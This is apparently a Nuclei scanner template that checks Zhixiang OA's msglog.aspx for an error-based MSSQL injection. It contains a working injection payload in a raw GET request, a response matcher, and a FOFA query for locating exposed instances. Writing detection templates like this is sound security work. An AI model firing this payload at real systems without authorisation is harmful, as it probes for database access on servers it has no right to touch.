id: zhixiang-oa-msglog-sqli

info:
  name: Zhixiang OA msglog.aspx - SQL injection
  author: SleepingBag945
  severity: high
  description: There is a SQL injection vulnerability in the msglog.aspx file of Zhixiang OA. Attackers can obtain sensitive information through the vulnerability.
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="致翔软件-致翔OA"
  tags: hongfan,oa,sqli

http:
  - raw:
      - |
        GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))-- HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(body, "43f845fa0c8aef9104f8e1b07625ecf8")'
          - 'contains(header, "text/html")'
        condition: and

# digest: 4b0a00483046022100b2f458ebe1d17d06d728f2fb0c4d53c0f5889b7eadbf0259136e2ae0091ec20e0221009002197997378fdf98fc66f2a0d08c1ba1a9d88b6528c859f9207643bfe4a008:922c64590222798bb761d5b6d8e72950
